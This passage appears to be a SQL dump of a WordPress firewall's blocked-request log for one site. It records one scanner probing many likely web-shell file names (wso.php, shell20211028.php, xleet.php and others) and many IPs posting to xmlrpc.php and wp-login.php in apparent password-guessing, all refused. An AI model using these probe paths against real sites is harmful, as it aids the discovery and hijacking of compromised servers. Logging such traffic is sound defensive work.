Chrome\\/85.0.4183.102 Safari\\/537.36\"}','OCpocrW3D4xTbBRQiI0AZmMU',0,1665249340.0865,310,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-admin/radio.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','HTear0vSWZ7yzoXGpnsFMIq8',0,1665249346.1488,296,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-blog.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','X57Tl2aJ0SBW3H4bVxzCyjGE',0,1665249350.7262,301,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-class.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','G0z6nRaW9BpK5FlsrZ8XHLm7',0,1665249352.4806,276,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-content/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','BLEAQoGNhU8ct2namH5g0zyS',0,1665249357.7581,312,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-content/fw.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','PoDQyACHTxGLS2rB4WabYpt8',0,1665249360.4723,275,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-content/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','k6rHDSCl8vTu7FMjYQdJmsbW',0,1665249367.2602,301,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-content/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','E2xfjqV4UbilF5nmeS0t9gTa',0,1665249369.8826,282,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-file.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','Alt18npjMBz2JqDXk9CHTrR7',0,1665249375.4815,278,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-includes/991176.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','H1VR3aphOxslyvmZ6rIzKquB',0,1665249378.9722,302,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-includes/about.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','B6oyZ901WtM7xOXzAU3YPnTc',0,1665249383.1110,303,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-includes/shell20211028.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','tKRB7lzvVns1Hje0xIf8oCUD',0,1665249389.9247,308,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-info.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','rX6jRq2vG97y0Sn1dNo8QCPE',0,1665249391.7218,337,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp-uploads.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','7CsEnoj6uypPm2x0Ovtb9Fdh',0,1665249396.1633,281,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jtcMLT1i2uZez6aV48KhF3mo',0,1665249397.7586,271,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','N5hy0W28SndDjz9YcaurUE43',0,1665249399.8059,298,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','fYsAwci8qlO2Hd7ahr9Gy1Rj',0,1665249402.7632,386,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/ws.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','D4I5EFPfVdTyjw0ktRHB3pQu',0,1665249406.2242,276,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wso.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','21HLR4Set5Zf8gTA0yCB3Xaq',0,1665249409.5389,1688,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wso1.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','WvnJkgyPc3xfDNSrjI4dpwYl',0,1665249419.1396,3476,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/wso2.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','2vVGIhYNJWQbnHjtgiR8cTaC',0,1665249425.5790,286,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/x.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','iXsAQ2cP8eGabnUmZxlEzwVu',0,1665249430.3493,296,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/xl.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','n4mPE5GJWdpOSzFRr3Dh92Xk',0,1665249434.4921,272,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/xleet.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','sYrozygXwx4D6EdHlbiT7ZIn',0,1665249439.6665,300,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','jdy5spv2LZaft7FmxVUbqXQB',0,1665249444.1226,3780,'','GET',404,0,515,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/xx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','NinKjCtWwLZXov1VOkE7JHs6',0,1665249456.4995,298,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/xxx.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','9ol83YIipjOb7AQJkCqseZv4',0,1665249462.6290,293,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/y.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','RSyidu2ks1GP3KFT4qJtfBVD',0,1665249463.8007,275,'','GET',403,0,700,0,1,'',0),('20.118.129.10',343310602,'','http://cteisys.com/z.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','kiOGuaR0mvjxSrWhplctDFV1',0,1665249467.9805,278,'','GET',403,0,700,0,1,'',0),('104.254.90.187',1761499835,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','VMCa5TG93IAHKJj0vuFNZ2Dn',0,1665249974.0101,18718,'','POST',403,0,515,0,1,'',0),('67.205.62.27',1137524251,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','2MDNPUsIGK1TygpqHhfXln9c',0,1665250410.7123,17496,'','POST',403,0,600,0,1,'',0),('103.152.164.103',1738056807,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gRdtZ5COTHnzUmKbAV9vi8Qe',0,1665264862.9490,489,'','POST',403,0,515,0,1,'',0),('8.210.102.36',148006436,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','R6wQOfjApGUd0P1FDYTctZW5',0,1665265353.4430,1534,'','POST',403,0,515,0,1,'',0),('103.254.12.61',1744702525,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p5SAycbFeWTmLEfKnGgr2X9k',0,1665265375.3206,1395,'','POST',403,0,515,0,1,'',0),('54.38.44.6',908471302,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','aWoOnYFG9bQSk5CxMcVvAw4B',0,1665265898.5956,10998,'','POST',403,0,515,0,1,'',0),('209.141.57.9',3515693321,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/35.0.1916.153 Safari\\/537.36\"}','guKUiezLEflvoORnHw7c0dmI',0,1665265917.7392,499,'','POST',403,0,600,0,1,'',0),('167.172.168.111',2813110383,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','mbJzCE2BUX5G6k8qhPnwRout',0,1665266128.0041,1295,'','POST',403,0,600,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Grdo4xM7vA38ROBE2pIZVPYy',0,1665268037.6684,14067,'','POST',403,0,515,0,1,'',0),('69.163.152.108',1168349292,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/49.0.2623.112 Safari\\/537.36\"}','XN7T4ty2r8C31haFKvi6MBgR',0,1665268102.5561,1194,'','POST',403,0,600,0,1,'',0),('111.90.150.36',1868207652,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KxDVIRoE30mX8uwaeOlUfzMT',0,1665268584.1273,18110,'','POST',403,0,515,0,1,'',0),('173.212.215.38',2916407078,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cEptZNW3wHiXBe6Ovyx2VURa',0,1665268602.6474,484,'','POST',403,0,515,0,1,'',0),('5.101.157.241',90545649,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','M0qhlsHINpbYT67PRd8DOoCB',0,1665269164.2602,7162,'','POST',403,0,515,0,1,'',0),('83.143.116.3',1401910275,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','YBMzgTHGSZCm4ox51kAnK92O',0,1665269153.8225,17679,'','POST',403,0,515,0,1,'',0),('39.106.15.209',661262289,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GlB4MwS96vAdUeuc8JEVXtZx',0,1665269697.1189,18315,'','POST',403,0,515,0,1,'',0),('104.219.251.247',1759247351,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','I4tOZ2cUJTSb5MjvadqiY3hA',0,1665269727.5446,511,'','POST',403,0,515,0,1,'',0),('124.153.66.86',2090418774,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','HCFJBkOyNu5Vw2QSr9dYeonI',0,1665272074.8261,1399,'','POST',403,0,600,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2ex5dVGSFWIhpJNUltuwHq93',0,1665272557.5576,16719,'','POST',403,0,515,0,1,'',0),('5.101.156.219',90545371,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BoOCMuy2VtdfnihkN9PAvDKb',0,1665272623.8059,1217,'','POST',403,0,515,0,1,'',0),('148.72.209.0',2487800064,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Olzi9MNJTVynkIh1WQ5CUS0q',0,1665273141.2670,11808,'','POST',403,0,515,0,1,'',0),('114.132.250.235',1921317611,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','p6olPt79JfXYWeZHmEjd8S4L',0,1665273165.5201,2201,'','POST',403,0,515,0,1,'',0),('62.102.148.166',1046910118,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','EzR8KVtjWZOPMk2lUSDiJA4I',0,1665273350.7631,2278,'','POST',403,0,515,0,1,'',0),('87.248.153.52',1475909940,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GH0O7o5gFSRbWT1CMJclisxf',0,1665275609.9800,504,'','POST',403,0,515,0,1,'',0),('43.251.135.37',737904421,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','HW5AKPFXbr2CtJ7qe0pwBzRO',0,1665276080.6048,15015,'','POST',403,0,600,0,1,'',0),('167.99.78.164',2808303268,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','x2EYDIzH1UrKCjveB0FPQn4O',0,1665276153.2790,1196,'','POST',403,0,515,0,1,'',0),('124.158.12.83',2090732627,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','FnWLA8XSdRHj7GJ04bTt9wlD',0,1665276771.6573,20113,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','4glcLCs9EiDSpZPwrtWU0mqe',0,1665276812.6114,526,'','POST',403,0,515,0,1,'',0),('123.31.21.26',2065634586,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','m6hlg3TVdBv1HUni5frw2YZc',0,1665278633.1175,1641,'','POST',403,0,515,0,1,'',0),('198.12.250.252',3322739452,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cK4YgJWTUuorZNExvFkeVDLt',0,1665278674.9569,582,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','cTrXas19i7A63PpkCSe2omhw',0,1665279286.6903,19973,'','POST',403,0,515,0,1,'',0),('203.112.72.51',3413133363,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PtT81D5WdeCBLX37kY4nzVwQ',0,1665279314.5547,480,'','POST',403,0,515,0,1,'',0),('192.30.89.75',3223214411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vaR5TLy9NioZ86KwSQPDngkl',0,1665279549.0618,2326,'','POST',403,0,515,0,1,'',0),('177.52.160.29',2973016093,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','guaDrkTodl7HCL8qOs6FKfw4',0,1665279931.0703,21008,'','POST',403,0,515,0,1,'',0),('157.230.15.115',2649100147,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','Mj2VsLB9Tgv1U3yt5qRedxZN',0,1665280104.5343,17343,'','POST',403,0,600,0,1,'',0),('51.142.90.138',864967306,'','http://cteisys.com/wp-plain.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','MDkhapNCv0wUBjEezic15QXO',0,1665280292.5122,2818,'','POST',403,0,700,0,1,'',0),('209.145.54.196',3515954884,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iZoRkaGndK4CeHQpIt1mgB7T',0,1665280540.2463,14722,'','POST',403,0,515,0,1,'',0),('194.233.67.171',3270067115,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zXM6SPGZotyEW1lvYI2TVBpN',0,1665280566.8115,515,'','POST',403,0,515,0,1,'',0),('202.29.236.140',3390958732,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','r20wOfQRvoiqcthg4EbB6uVy',0,1665282110.0325,17864,'','POST',403,0,600,0,1,'',0),('103.27.238.234',1729883882,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','NirtkVBhWJ42FLx5ugyzfXpH',0,1665282504.1323,18370,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2oJTuFbzqScfGvUtwdhaWM75',0,1665282518.2302,4351,'','POST',403,0,515,0,1,'',0),('207.244.239.41',3488935721,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2c194G8hawZHNRbgyP0KluD3',0,1665283126.6483,19410,'','POST',403,0,515,0,1,'',0),('51.91.83.187',861623227,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','iEAbRKZJp3Gm7gxwlk95LHfq',0,1665283154.6156,513,'','POST',403,0,515,0,1,'',0),('185.197.195.173',3116745645,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','BNqntpEcSgbRefF5i69Yu4zK',0,1665283764.2903,17796,'','POST',403,0,515,0,1,'',0),('38.242.221.235',653450731,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','2HKfGbOXFDTygkVojWh0usw3',0,1665283784.8561,508,'','POST',403,0,515,0,1,'',0),('173.236.184.116',2917972084,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','0mFDGSr6i4s7qjZH9YanWClo',0,1665284121.8795,1242,'','POST',403,0,600,0,1,'',0),('74.208.103.228',1255172068,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Tv1K4puD6rIEcZQ950OwNhjF',0,1665284379.1293,18218,'','POST',403,0,515,0,1,'',0),('198.244.167.101',3337922405,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.80 Safari\\/537.36\"}','mFld8qicsUKwtXxRA743oZTn',0,1665368977.3174,17267,'','POST',403,0,600,0,1,'',0),('35.198.25.12',600185100,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','lbChnt0ypKjRsTXHqBrAzkEd',0,1665369053.1302,2620,'','POST',403,0,515,0,1,'',0),('119.237.81.29',2012041501,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','iKMQVgqvI2aRxd1o4HWbjh7s',0,1665369418.5732,8313,'','POST',403,0,600,0,1,'',0),('184.75.221.203',3091979723,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','f8a3hAVBIZtrsDKYH4N1TqFe',0,1665369559.2096,2369,'','POST',403,0,515,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','cRrpUCludz4JZNK7nmkOE6o5',0,1665370002.9230,459,'','POST',403,0,600,0,1,'',0),('89.238.150.43',1508808235,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','BwMcD1pOs4rfHFRqmnIYEd6G',0,1665370220.2571,2858,'','POST',403,0,515,0,1,'',0),('66.29.131.126',1109230462,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','pmM9dDjQFHK0AqNfO4oJxkzw',0,1665370310.3247,14671,'','POST',403,0,515,0,1,'',0),('173.236.169.240',2917968368,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','fD3vpS5giqtxPEXcrTkwKsbO',0,1665370442.1585,1399,'','POST',403,0,600,0,1,'',0),('213.152.161.118',3583549814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','hjNSYkiI9CGKWpHM4zfu0eUb',0,1665372209.3666,18766,'','POST',403,0,515,0,1,'',0),('66.94.117.33',1113486625,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','5oa6LhujIWzMpR4tZrwD29PK',0,1665372389.5648,507,'','POST',403,0,515,0,1,'',0),('167.71.69.173',2806465965,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','ySqG6IhXilQz2kuCvoZLUV53',0,1665372751.8423,18396,'','POST',403,0,515,0,1,'',0),('147.135.255.8',2475163400,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','u9gZpSR0f5c3bIKjQMrGeDsa',0,1665373082.0130,1659,'','POST',403,0,600,0,1,'',0),('108.167.189.59',1822932283,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 